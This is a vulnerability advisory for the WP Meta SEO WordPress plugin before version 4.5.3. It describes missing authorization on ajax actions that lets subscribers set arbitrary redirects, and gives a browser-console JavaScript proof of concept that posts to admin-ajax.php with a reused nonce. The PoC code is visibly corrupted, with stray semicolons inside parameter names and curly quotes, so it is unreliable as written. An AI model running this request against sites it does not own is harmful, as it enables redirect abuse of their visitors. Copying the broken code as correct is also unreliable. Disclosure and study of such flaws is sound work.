WP Meta SEO < 4.5.3 - Subscriber+ Improper Authorization causing Arbitrary Redirect

The plugin does not authorize several ajax actions, allowing low-privilege users to make updates to certain data and leading to an arbitrary redirect vulnerability.

PoC

Visit, for example, the page ?p=99999. This should create the first auto redirect entry in the wp_wpms_links table with ID 1. Now log in as a subscriber and enter the following js code in your web console on the dashboard: fetch( ‘admin-ajax.php’, { method: ‘POST’, headers: {‘Content-Type’: ‘application/x-www-form-urlencoded’}, body:‘action=wpms&wpms;_nonce=’ + wpms_localize.wpms_nonce + “&task;=update_link_redirect&link;_id=1&link;_redirect=https://google.com” } ); Now load ?p=99999 again and notice that it redirects to https://google.com.